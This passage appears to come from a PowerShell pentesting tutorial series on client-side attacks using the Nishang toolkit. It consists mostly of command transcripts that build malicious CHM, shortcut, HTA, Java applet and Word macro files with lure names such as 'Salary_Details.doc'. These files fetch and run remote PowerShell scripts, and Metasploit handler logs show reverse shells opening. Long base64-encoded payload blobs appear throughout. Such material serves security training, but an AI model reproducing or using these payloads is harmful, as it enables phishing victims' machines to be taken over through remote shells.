ACcAagBWAFgAZgBiADkAbwB3AEUASAA0AHUARQB2ACsARABGADAAVQBqADAAYwBDAEQAcQB0AHAATAB0AFEAZgBXADAAcQBuAFMAQgBGAFAAcAAxAEkAZABwAFUAawBOAHkAQQBXAC8ARwBwAHIAYQB6AFUAbgBYADgANwB6AHYALwBBAEEAbwBOAEYAWQBrAFUASgBjAD cAMwAzAFgAMQAzADUAegB2AEgAVwB1AFoALwB3AEoARABQAFIATQBCAGoAUgAwADUAKwBRADIANwBJACsARQBrAGIAbQBOAE0AaABHAEQAcAAyAHYAegBXADkAegBSAGMAWABuAEkARQB3AFMAYQB2AFgAcABmAFkAKwA3AFgANQBxAHQAYwBrAFoAWAB1AGwANQBzADgA SABLAEoAQQA2AG0ATwB2AEIAQQBZAGwARgB4AG4AagA3AEQAawBoAG4AUwBXAHoAVQBiAHMAVABZAEsAcwBqAG0ANgBDAFMAagA2AEYAYwB6AFkAcgBTAFcAVwBIAGoAOABxAFoAawBEAFYAeQByAGcAZQBVAFkAKwA4AGMANQBnAGsAMgBIAEsAMABTAFYAVwBXAEIAMg BoAGYAbgBnAHoAOAAvAEUAVgA2ADMAZABNAHoAaQB3AFMAUgB5ADQASwBKAGEAUwAzADIARgBwAGEARwA5AG4AWABPADIAQwBEAEEAawBGAEwASQBaAHUATwA1ADIAVABnAEoAMgB1AGcAVgByAC8AVABNAHEAVAAyAEoAVQBVAEIAaABnADcARgBoAGgAZwBXAE4AMwAx AEcARQA3ADQAOAB6AHgAbQBHAHQAawBsADUAbQBKAHUAdgAvAHoAUgBqAFAASgBoAHgASQBSAHkAcgBpAHkAZABzAHMARQBlAHQAawBhAHoATAB3AGIAdgBBAHoAQwBmAEcAMQBTAGIAZgB0AEEAawBrAFIAdQBiAEwAdQBaAEcAVgBMAHQAZwBrAHEAWgBCAFAAZgBkAG kAagBPAFoAbwBxAG0ARgBqAHoATABJAFkAbgB1ADEAYgAyAEkAMgBsAEgAMABjAHMAawB2ADIAQgBpAHcAaABPACsAcwBZAFEAbwBQAFYAYwBaADEARQB0AG4AcQBSAFcAbgBxADUAVwBWAHEANgBpAE8AMABVAEkAdAAxADAARwB0AFIAdwBIAEoAVQBKAGkAMwBTAFMA awBsAG4AaQBzAFgAdgBlAGYAeQBHADQARwBDADYAbQB1AGcAZwBiADUALwAxAG8AZQBlAGMAbgAyAHgAaQAyAHMAVgAzADIANgA4AFkAQQBXADgAbABXAEIAOQBVAEwAegBnAHoANwBnAC8AbABJAEsAWgBtADUAbwBRADQASABXAFQAdgBpAGgAZABNAGwAQgBLADkARA BIAEUATABqAEgAYQAyAHcAQwBYAEwAcABrAEoAcQB3ADMASgBOAHYAeQB1AFoAZwA5AFoAagBrAHkAbAB6AGoAWQBSAEQAaAB1AGcAVgBWAG4AcQBZAHoAYwBFAG0ASgBwADgAWABGAEoAWQBRAEgAUQBUAGYAUQBNAEUAVQBlAGsAUwB6AG8AcwBoAFUATQBWAEIASwAy AHEAMABiAEcAMQBYAEIAMABhAHgAUgBaAFIAWQArAFUAVwAvAFMAZgBtAGcAWQB6ADQARAB6AHcAUgBMAHkAeQBsAGkAQgBjAFkAbABGAFAAVQB6AG8AcQAyAGsAMQB4AC8ANQAyAFIAZgA2AFkAdQB6AG8AUQBsACsARABhAGkASQA3AE4AWQBSADIAWABiAGgASgByAF oAVABuADMAaAAyAEYASgBTAHYANABSAEQATABvAHoAeABGADYAcABoAGQAMQBsAHoARgB4AEoATgBjAEQAZABtAHEAUQAxAEMARwAyAEsAcwBMAFcAYwB5AFIAZABaAGQARQAxADIASwB3AGUAaQBPAEUAUQBFAHAAWABhAEoAcgBtAGgAdgA4ADEAaABKAEUAbQBSAFkA UABSAGUAeQB3AEoANABYAFEATABxAHUAeQAvAGUAUgB6AG8AdQBmAEgATQBIAFoAYQA4AHkASwBBAEoAYgB0AEMARABiAEcAVwBNAE4AMgByAGUASwBmADEAbwA3AHYAegBmAFcANABTAHQANQBIAHQAcwB3AFIAaQBYAHkAaABiAGEAcgB4AHUAKwBOADcANwAzAHoATA BkAFkAOAB0AGYANAA5AGUAUQAxAHUAdABoADQAUgBGADIAZwBTAEUAQQAyAEcAcgBjAEQAMQBWADMAVgBEAC8AeABnAFEANABiAEUAagBuAHkAcwArADUAMQBaADAAZABwAGEAUgArAEwARwAwAE8ARABaAHAAegBxAGMARQBmAEkAKwBGAHcAZQBiAGsAUwB4AGoARABU AEMANwBmAFcAYgBQAHcASAAnACkAKQApACkALAAgAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkALAAgAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG 4AZwBdADoAOgBBAFMAQwBJAEkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsA PS C:\Users\Administrator\Desktop\nishang-master> ``` ```PowerShell PS C:\Users\Administrator\Desktop\nishang-master> Out-CHM " -e SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACgAJAAoAE4AZQB3 AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACAAKAAkACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACAAKAAsACQAKABbAEMAbwBuAHY AZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAagBWAFgAZgBiADkAbwB3AEUASAA0AHUARQB2ACsARABGADAAVQBqADAAYwBDAEQAcQB0AHAATAB0AFEAZgBXADAAcQBuAFMAQgBGAFAAcAAxAEkAZABwAFUAawBOAHkAQQBXAC8ARw BwAHIAYQB6AFUAbgBYADgANwB6AHYALwBBAEEAbwBOAEYAWQBrAFUASgBjADcAMwAzAFgAMQAzADUAegB2AEgAVwB1AFoALwB3AEoARABQAFIATQBCAGoAUgAwADUAKwBRADIANwBJACsARQBrAGIAbQBOAE0AaABHAEQAcAAyAHYAegBXADkAegBSAGMAWABuAEkARQB3A FMAYQB2AFgAcABmAFkAKwA3AFgANQBxAHQAYwBrAFoAWAB1AGwANQBzADgASABLAEoAQQA2AG0ATwB2AEIAQQBZAGwARgB4AG4AagA3AEQAawBoAG4AUwBXAHoAVQBiAHMAVABZAEsAcwBqAG0ANgBDAFMAagA2AEYAYwB6AFkAcgBTAFcAVwBIAGoAOABxAFoAawBEAFYA eQByAGcAZQBVAFkAKwA4AGMANQBnAGsAMgBIAEsAMABTAFYAVwBXAEIAMgBoAGYAbgBnAHoAOAAvAEUAVgA2ADMAZABNAHoAaQB3AFMAUgB5ADQASwBKAGEAUwAzADIARgBwAGEARwA5AG4AWABPADIAQwBEAEEAawBGAEwASQBaAHUATwA1ADIAVABnAEoAMgB1AGcAVgB yAC8AVABNAHEAVAAyAEoAVQBVAEIAaABnADcARgBoAGgAZwBXAE4AMwAxAEcARQA3ADQAOAB6AHgAbQBHAHQAawBsADUAbQBKAHUAdgAvAHoAUgBqAFAASgBoAHgASQBSAHkAcgBpAHkAZABzAHMARQBlAHQAawBhAHoATAB3AGIAdgBBAHoAQwBmAEcAMQBTAGIAZgB0AE EAawBrAFIAdQBiAEwAdQBaAEcAVgBMAHQAZwBrAHEAWgBCAFAAZgBkAGkAagBPAFoAbwBxAG0ARgBqAHoATABJAFkAbgB1ADEAYgAyAEkAMgBsAEgAMABjAHMAawB2ADIAQgBpAHcAaABPACsAcwBZAFEAbwBQAFYAYwBaADEARQB0AG4AcQBSAFcAbgBxADUAVwBWAHEAN gBpAE8AMABVAEkAdAAxADAARwB0AFIAdwBIAEoAVQBKAGkAMwBTAFMAawBsAG4AaQBzAFgAdgBlAGYAeQBHADQARwBDADYAbQB1AGcAZwBiADUALwAxAG8AZQBlAGMAbgAyAHgAaQAyAHMAVgAzADIANgA4AFkAQQBXADgAbABXAEIAOQBVAEwAegBnAHoANwBnAC8AbABJ AEsAWgBtADUAbwBRADQASABXAFQAdgBpAGgAZABNAGwAQgBLADkARABIAEUATABqAEgAYQAyAHcAQwBYAEwAcABrAEoAcQB3ADMASgBOAHYAeQB1AFoAZwA5AFoAagBrAHkAbAB6AGoAWQBSAEQAaAB1AGcAVgBWAG4AcQBZAHoAYwBFAG0ASgBwADgAWABGAEoAWQBRAEg AUQBUAGYAUQBNAEUAVQBlAGsAUwB6AG8AcwBoAFUATQBWAEIASwAyAHEAMABiAEcAMQBYAEIAMABhAHgAUgBaAFIAWQArAFUAVwAvAFMAZgBtAGcAWQB6ADQARAB6AHcAUgBMAHkAeQBsAGkAQgBjAFkAbABGAFAAVQB6AG8AcQAyAGsAMQB4AC8ANQAyAFIAZgA2AFkAdQ B6AG8AUQBsACsARABhAGkASQA3AE4AWQBSADIAWABiAGgASgByAFoAVABuADMAaAAyAEYASgBTAHYANABSAEQATABvAHoAeABGADYAcABoAGQAMQBsAHoARgB4AEoATgBjAEQAZABtAHEAUQAxAEMARwAyAEsAcwBMAFcAYwB5AFIAZABaAGQARQAxADIASwB3AGUAaQBPA EUAUQBFAHAAWABhAEoAcgBtAGgAdgA4ADEAaABKAEUAbQBSAFkAUABSAGUAeQB3AEoANABYAFEATABxAHUAeQAvAGUAUgB6AG8AdQBmAEgATQBIAFoAYQA4AHkASwBBAEoAYgB0AEMARABiAEcAVwBNAE4AMgByAGUASwBmADEAbwA3AHYAegBmAFcANABTAHQANQBIAHQA cwB3AFIAaQBYAHkAaABiAGEAcgB4AHUAKwBOADcANwAzAHoATABkAFkAOAB0AGYANAA5AGUAUQAxAHUAdABoADQAUgBGADIAZwBTAEUAQQAyAEcAcgBjAEQAMQBWADMAVgBEAC8AeABnAFEANABiAEUAagBuAHkAcwArADUAMQBaADAAZABwAGEAUgArAEwARwAwAE8ARAB aAHAAegBxAGMARQBmAEkAKwBGAHcAZQBiAGsAUwB4AGoARABUAEMANwBmAFcAYgBQAHcASAAnACkAKQApACkALAAgAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAH MAcwApACkALAAgAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsA" -HHCPath 'C:\Program Files (x86)\HTML Help Workshop' Microsoft HTML Help Compiler 4.74.8702 Compiling c:\Users\Administrator\Desktop\nishang-master\doc.chm Compile time: 0 minutes, 0 seconds 2 Topics 4 Local links 4 Internet links 0 Graphics Created c:\Users\Administrator\Desktop\nishang-master\doc.chm, 14,994 bytes Compression decreased file by 1,230 bytes. PS C:\Users\Administrator\Desktop\nishang-master> ``` Run ```doc.chm``` ```sh root@kali:~# msfconsole msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/shell/reverse_tcp PAYLOAD => windows/shell/reverse_tcp msf exploit(handler) > set LHOST 10.0.0.206 LHOST => 10.0.0.206 msf exploit(handler) > set LPORT 4444 LPORT => 4444 msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/shell/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 10.0.0.206 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > exploit [*] Started reverse TCP handler on 10.0.0.206:4444 [*] Starting the payload handler... [*] Encoded stage with x86/shikata_ga_nai [*] Sending encoded stage (267 bytes) to 10.0.0.233 [*] Command shell session 1 opened (10.0.0.206:4444 -> 10.0.0.233:51162) at 2017-07-17 17:13:28 -0400 whoami pfpt\administrator ``` - Out-Shortcut ```PowerShell PS C:\Users\Administrator\Desktop\nishang-master> Get-Help Out-Shortcut -Examples NAME Out-Shortcut SYNOPSIS Nishang script which creates a shortcut capable of launching PowerShell commands and scripts. -------------------------- EXAMPLE 1 -------------------------- PS >Out-Shortcut -Payload "-WindowStyle hidden -ExecutionPolicy Bypass -noprofile -noexit -c Get-ChildItem" Above command would execute Get-ChildItem on the target machine when the shortcut is opened. Note that powershell.exe is not a part of the payload as the shortcut already points to it. -------------------------- EXAMPLE 2 -------------------------- PS >Out-Shortcut -PayloadURL http://192.168.254.1/Get-Wlan-Keys.ps1 Use above command to generate a Shortcut which download and execute the given powershell script in memory on target. -------------------------- EXAMPLE 3 -------------------------- PS >Out-Shortcut -Payload "-EncodedCommand <>" Use above command to generate a Shortcut which executes the given encoded command/script. Use Invoke-Encode from Nishang to encode the command or script. -------------------------- EXAMPLE 4 -------------------------- PS >Out-Shortcut -PayloadURL http://192.168.254.1/powerpreter.psm1 -Arguments Check-VM Use above command to pass an argument to the powershell script/module. -------------------------- EXAMPLE 5 -------------------------- PS >Out-Shortcut -PayloadURL http://192.168.254.1/powerpreter.psm1 -Arguments Check-VM -HotKey 'F3' Use above command to assign F3 as hotkey to the shortcut -------------------------- EXAMPLE 6 -------------------------- PS >Out-Shortcut -PayloadURL http://192.168.254.1/powerpreter.psm1 -Arguments Check-VM -HotKey 'F3' -Icon 'notepad.exe' Use above command to assign notepad icon to the generated shortcut. PS C:\Users\Administrator\Desktop\nishang-master> ``` ```PowerShell PS C:\Users\Administrator\Desktop\nishang-master> Out-Shortcut -PayloadURL http://10.0.0.233:8000/mini-reverse.ps1 The Shortcut file has been written as C:\Users\Administrator\Desktop\nishang-master\Shortcut to File Server.lnk PS C:\Users\Administrator\Desktop\nishang-master> ``` ```PowerShell PS C:\Users\Administrator\Desktop\nishang-master> ls '.\Shortcut to File Server.lnk' Directory: C:\Users\Administrator\Desktop\nishang-master Mode LastWriteTime Length Name ---- ------------- ------ ---- -a--- 7/17/2017 3:21 PM 1544 Shortcut to File Server.lnk PS C:\Users\Administrator\Desktop\nishang-master> ``` Run ```Shortcut to File Server.lnk``` ```sh root@kali:~# msfconsole msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/shell/reverse_tcp PAYLOAD => windows/shell/reverse_tcp msf exploit(handler) > set LHOST 10.0.0.206 LHOST => 10.0.0.206 msf exploit(handler) > set LPORT 4444 LPORT => 4444 msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/shell/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 10.0.0.206 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > exploit [*] Started reverse TCP handler on 10.0.0.206:4444 [*] Starting the payload handler... [*] Encoded stage with x86/shikata_ga_nai [*] Sending encoded stage (267 bytes) to 10.0.0.233 [*] Command shell session 2 opened (10.0.0.206:4444 -> 10.0.0.233:16820) at 2017-07-17 18:21:50 -0400 whoami pfpt\administrator ``` ![Image of Target](images/18.jpeg) ================================================ FILE: 48-Client-Side-Attacks-Part-3.md ================================================ #### 48. Client Side Attacks Part 3 ###### Phishing/Drive-by-download - Out-HTA - Out-Java - Out-HTA ```PowerShell PS C:\Users\Administrator\Desktop\nishang-master> Import-Module .\nishang.psm1 WARNING: The names of some imported commands from the module 'nishang' include unapproved verbs that might make them less discoverable. To find the commands with unapproved verbs, run the Import-Module command again with the Verbose parameter. For a list of approved verbs, type Get-Verb. WARNING: Some imported command names contain one or more of the following restricted characters: # , ( ) {{ }} [ ] & - / \ $ ^ ; : " ' < > | ? @ ` * % + = ~ PS C:\Users\Administrator\Desktop\nishang-master> ``` ```PowerShell PS C:\Users\Administrator\Desktop\nishang-master> Get-Help Out-HTA -Examples NAME Out-HTA SYNOPSIS Nishang script which could be used for generating "infected" HTML Application. It could be deployed on a web server and PowerShell scripts and commands could be executed on the target machine. -------------------------- EXAMPLE 1 -------------------------- PS >Out-HTA -Payload "powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c Get-ChildItem" Above command would execute Get-ChildItem on the target machine when the HTA is opened. -------------------------- EXAMPLE 2 -------------------------- PS >Out-HTA -PayloadURL http://192.168.254.1/Get-Information.ps1 Use above command to generate HTA and VBS files which download and execute the given powershell script in memory on target. -------------------------- EXAMPLE 3 -------------------------- PS >Out-HTA -PayloadURL http://192.168.254.1/powerpreter.psm1 -Arguments Check-VM Use above command to pass an argument to the PowerShell script/module. -------------------------- EXAMPLE 4 -------------------------- PS >Out-HTA -PayloadScript C:\nishang\Shells\Invoke-PowerShellTcpOneLine.ps1 Use above when you want to use a PowerShell script as the payload. Note that if the script expects any parameter passed to it, you must pass the parameters in the script itself. PS C:\Users\Administrator\Desktop\nishang-master> ``` [```mini-reverse.ps1```](https://gist.github.com/staaldraad/204928a6004e89553a8d3db0ce527fd5) ```PowerShell PS C:\Users\Administrator\Desktop\nishang-master> Out-HTA -PayloadURL http://10.0.0.233/mini-reverse.ps1 HTA written to C:\Users\Administrator\Desktop\nishang-master\WindDef_WebInstall.hta. PS C:\Users\Administrator\Desktop\nishang-master> ``` ```PowerShell PS C:\Users\Administrator\Desktop\nishang-master> ls .\WindDef_WebInstall.hta Directory: C:\Users\Administrator\Desktop\nishang-master Mode LastWriteTime Length Name ---- ------------- ------ ---- -a--- 7/17/2017 3:35 PM 1968 WindDef_WebInstall.hta PS C:\Users\Administrator\Desktop\nishang-master> ``` Run ```WindDef_WebInstall.hta``` ```sh root@kali:~# msfconsole msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/shell/reverse_tcp PAYLOAD => windows/shell/reverse_tcp msf exploit(handler) > set LHOST 10.0.0.206 LHOST => 10.0.0.206 msf exploit(handler) > set LPORT 4444 LPORT => 4444 msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/shell/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 10.0.0.206 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > exploit [*] Started reverse TCP handler on 10.0.0.206:4444 [*] Starting the payload handler... [*] Encoded stage with x86/shikata_ga_nai [*] Sending encoded stage (267 bytes) to 10.0.0.233 [*] Command shell session 4 opened (10.0.0.206:4444 -> 10.0.0.233:16894) at 2017-07-17 18:39:08 -0400 whoami pfpt\administrator ``` - Out-Java ```PowerShell PS C:\Users\Administrator\Desktop\nishang-master> Get-Help Out-Java -Examples NAME Out-Java SYNOPSIS Nishang script which could be used for generating JAR to be used for applets. -------------------------- EXAMPLE 1 -------------------------- PS >Out-Java -Payload "Get-Process" -JDKPath "C:\Program Files\Java\jdk1.7.0_25" Above command would execute Get-Process on the target machine when the JAR or Class file is executed. -------------------------- EXAMPLE 2 -------------------------- PS >Out-Java -PayloadURL http://192.168.254.1/Get-Information.ps1 -JDKPath "C:\Program Files\Java\jdk1.7.0_25" Use above command to generate JAR which download and execute the given powershell script in memory on target. -------------------------- EXAMPLE 3 -------------------------- PS >Out-Java -Payload "-e " -JDKPath "C:\Program Files\Java\jdk1.7.0_25" Use above command to generate JAR which executes the encoded script. Use Invoke-Command from Nishang to encode the script. -------------------------- EXAMPLE 4 -------------------------- PS >Out-Java -PayloadURL http://192.168.254.1/powerpreter.psm1 -Arguments Check-VM -JDKPath "C:\Program Files\Java\jdk1.7.0_25" Use above command to pass an argument to the powershell script/module. -------------------------- EXAMPLE 5 -------------------------- PS >Out-Java -PayloadURL http://192.168.254.1/powerpreter.psm1 -Arguments Check-VM -JDKPath "C:\Program Files\Java\jdk1.7.0_25" -NoSelfSign Due to the use of -NoSelfSign in above command, no self signed certificate would be used to sign th JAR. PS C:\Users\Administrator\Desktop\nishang-master> ``` [```mini-reverse.ps1```](https://gist.github.com/staaldraad/204928a6004e89553a8d3db0ce527fd5) ```PowerShell PS C:\Users\Administrator\Desktop\nishang-master> Out-Java -PayloadURL http://10.0.0.233/mini-reverse.ps1 -JDKPath 'C:\Program Files\Java\jdk1.8.0_131' added manifest adding: JavaPS.class(in = 1156) (out= 688)(deflated 40%) jar signed. Warning: The signer certificate will expire within six months. No -tsa or -tsacert is provided and this jar is not timestamped. Without a timestamp, users may not be able to validate this jar after the signer certificate's expiration date (2017-10-15) or after any f uture revocation date. PS C:\Users\Administrator\Desktop\nishang-master> ``` ```PowerShell PS C:\Users\Administrator\Desktop\nishang-master> ls .\applet.html Directory: C:\Users\Administrator\Desktop\nishang-master Mode LastWriteTime Length Name ---- ------------- ------ ---- -a--- 7/17/2017 3:55 PM 253 applet.html PS C:\Users\Administrator\Desktop\nishang-master> ``` ```PowerShell PS C:\Users\Administrator\Desktop\nishang-master> ls .\SignedJavaPS.jar Directory: C:\Users\Administrator\Desktop\nishang-master Mode LastWriteTime Length Name ---- ------------- ------ ---- -a--- 7/17/2017 3:55 PM 2598 SignedJavaPS.jar PS C:\Users\Administrator\Desktop\nishang-master> ``` Run ```applet.html``` ```sh root@kali:~# msfconsole msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/shell/reverse_tcp PAYLOAD => windows/shell/reverse_tcp msf exploit(handler) > set LHOST 10.0.0.206 LHOST => 10.0.0.206 msf exploit(handler) > set LPORT 4444 LPORT => 4444 msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/shell/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 10.0.0.206 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > exploit [*] Started reverse TCP handler on 10.0.0.206:4444 [*] Starting the payload handler... [*] Encoded stage with x86/shikata_ga_nai [*] Sending encoded stage (267 bytes) to 10.0.0.233 [*] Command shell session 1 opened (10.0.0.206:4444 -> 10.0.0.233:51162) at 2017-07-17 17:13:28 -0400 whoami pfpt\administrator ``` ================================================ FILE: 49-Client-Side-Attacks-Part-4.md ================================================ #### 49. Client Side Attacks Part 4 ###### Using Modules ```PowerShell PS C:\Users\Administrator\Desktop\nishang-master> Import-Module .\nishang.psm1 WARNING: The names of some imported commands from the module 'nishang' include unapproved verbs that might make them less discoverable. To find the commands with unapproved verbs, run the Import-Module command again with the Verbose parameter. For a list of approved verbs, type Get-Verb. WARNING: Some imported command names contain one or more of the following restricted characters: # , ( ) {{ }} [ ] & - / \ $ ^ ; : " ' < > | ? @ ` * % + = ~ PS C:\Users\Administrator\Desktop\nishang-master> ``` ```PowerShell PS C:\Users\Administrator\Desktop\nishang-master> Out-Word -PayloadURL http://10.0.0.233/Powerpreter.psm1 -Arguments Get-Information Saved to file C:\Users\Administrator\Desktop\nishang-master\Salary_Details.doc 0 PS C:\Users\Administrator\Desktop\nishang-master> ``` ```PowerShell PS C:\Users\Administrator\Desktop\nishang-master> ls .\Salary_Details.doc Directory: C:\Users\Administrator\Desktop\nishang-master Mode LastWriteTime Length Name ---- ------------- ------ ---- -a--- 7/17/2017 4:22 PM 28672 Salary_Details.doc PS C:\Users\Administrator\Desktop\nishang-master> ``` Run ```Salary_Details.doc``` View → Macros → View Macros → Document_Open → Edit ![Image of Doc](images/19.jpeg) ###### Using another client side attack from a client side attack ```PowerShell PS C:\Users\Administrator\Desktop\nishang-master> Import-Module .\nishang.psm1 WARNING: The names of some imported commands from the module 'nishang' include unapproved verbs that might make them less discoverable. To find the commands with unapproved verbs, run the Import-Module command again with the Verbose parameter. For a list of approved verbs, type Get-Verb. WARNING: Some imported command names contain one or more of the following restricted characters: # , ( ) {{ }} [ ] & - / \ $ ^ ; : " ' < > | ? @ ` * % + = ~ PS C:\Users\Administrator\Desktop\nishang-master> ``` [```Out-ShortcutModified.ps1```](https://github.com/Kan1shka9/PowerShell-for-Pentesters/blob/master/Code/49/Out-ShortcutModified.ps1) ```PowerShell PS C:\Users\Administrator\Desktop\nishang-master> Invoke-Encode -DataToEncode .\Client\Out-ShortcutModified.ps1 -OutCommand Encoded data written to .\encoded.txt Encoded command written to .\encodedcommand.txt PS C:\Users\Administrator\Desktop\nishang-master> ``` ```PowerShell PS C:\Users\Administrator\Desktop\nishang-master> cat .\encodedcommand.txt SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACgAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALg BEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACAAKAAkACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACAAKAAsACQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAo ACcAbgBWAFYAYgBiADUAcwB3AEYASAA2AFAAbABQAC8AZwBvAFUAaQBBAEYATQBoAHQAMwBhAFIATwBlAFYAagBUAFYAcQB2AGEAdABXAGkAMAB5AHEAUwBtAEQAdwA2AGMAQgBLADkAZwBJADkAdQA1AG8ASwByAC8AZgBUAGEAWABoAHQARgBKAHkAdwBBAEoAWAA4AD cAeAArAFkANwBQADkAOQBtAHMATgBqAFMAUQBoAEYARgAwAHQANQBHAE8ASAB6AEUAdQBnADQAMwBzAGQAbAA2ADYAbgBXADQASABxAGUAZAB4AGwAbwBRAHgAeQBEAE4AQwBRADAATABYAGwAdgAyAEUAUABNAHgAeABZAGgAVgBXAC8AUgB4ADYAagA3AGsASgBKAEgA RABMAFkANABMAGsAWQBhAGQAbwAyAEUAZgBmAE0AUQAyAHgAWgBEAHgAVAB3ADkANABsAGoAZwBYAFkAVAA3AFYAbAB2AHUAUQBxAGQAbQAyAG0AZAA3AEUASABsAFEAWgBlAHgAcQBCAFcARwBMAFAAVAB4AFYAegBoAHMANQAxAFkAKwBKAG0AUQBrAEUAegBHADEAWQ BUAEgAZABzAEQAOQBDAE8ASgA0AHMAUgAyADUAdwAwAFcAcQB4ADAASwBQAFgAZABpAEQAMABUADgAKwB6AFYARwBMAE4ARAAyAGMAeABRAHkASAAvADQARQB5AGIAbwAvAHkAOABPAE8AbQBYADcARgB5AEQATgBTAGsAQgBkAFIAWAB2AHQANABrAFEASwBYADQAQQAr AG4AdgA4AFQAKwAyAGkASwA5AEUAbABtADYAawBoADIAVwBrAGUAZQAyAGwAdQAzAEIAUgBhAFEANQBKAGgAaQA2AEoASQB0AHcASAB2AGcAWAB1AHgAdgBUAFoATwBDAEsATABrAHgAWgBaAGYARwBQAHkARwByAFMAMwBlAFgAbABpADUAaABqAC8AUQB2AG4AVQBBAH UAVQBxAFkASABSAHEAdwBqADYATgBHAFYAZgA3AFUAWABJADAAQwA2AGcASwB6AGkANABhAHMAcgBJACsAVgBCAHkAWABVAHkALwB2ADIAZABmADEAUQBrADYAaABlAGwAOQBtAHEAawA0AFIAQwBVAE8AZwB5AEMAbgBPAGkAcwByAFQAWQB6AEUASgBNAG4AUwBXAHAA VgBnAEkANQBGAEEAVwBzAHoAWABUAGIAYwByAFoAUwBsAGYAVwBDAGQARABWAHgAVQA5AGsAVwBiAGUAdwBjACsANgBXAHYAeQBDAFEANgBCAGEAawBPADQAZgBsAEwAQwBhAEsAZAB0AHMAOQBaAHoAdQBxADQAWQByAHQAVwBHAFoATgBmAEsAWgB0AGYAegBrAEkAeA BDAGgAUwBmAEMAMgBhADMAbAB4AEUAKwBTAGwAVQBhAGQAYQBDAE8AdwBGAEwAeQB1ADcAYwBEAHoAaABKAHAAWgB0ADcAbABZAHYAZQBxAEoAOABlAEEAcgBnAHoARABsAGgAQwBaAGIASgBxAGsAcgBFAGIAeQA5AHgANwB6AE4AZABRAHEAYQBsADIAWgB6AFQAOQB6 AGsASABrADQAQQBXAFgAUgBsADEAeAA1AFQAVwBDAEgAbABKAEYATABxAEEAWgBTAHgATABGAGMAMAB3AG8ARwBNADAAbwA5AGQAcABQADAAZQBlAG0AVwBZAG4AcQBPAFIAZABWAEsAYQArAG0AWABjAHYAaABoAGcAVwA0AHkAaQBMAFgAUgAzAC8ANABEAHUAYQB0AH cAagBwAFUAVwBmADIAbQBqADQAKwAzAFkASgBYAGwAbQBIAE0AaQB3AFMAbQBxAGgASQB6ADcAUwBCADIAZwBhAG4AOAA1ADYAUgBFAFcAYQBBAGwASwBLAEQAdgBsAEsARgBXAHIAeAByAFcAaQBHAGwAcQBOAHIALwBwAFQALwB3AEUAZwA1ADgAQQA3AGkAcQBSAE0A VAB3AGUARAAwAGQARABWADcAMwBnAHkARwBTAFMARQBFAG8AZQBEAE8AcQBZAEMAMwBGAFMATQB1AHAAMwBmACcAKQApACkAKQAsACAAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYw 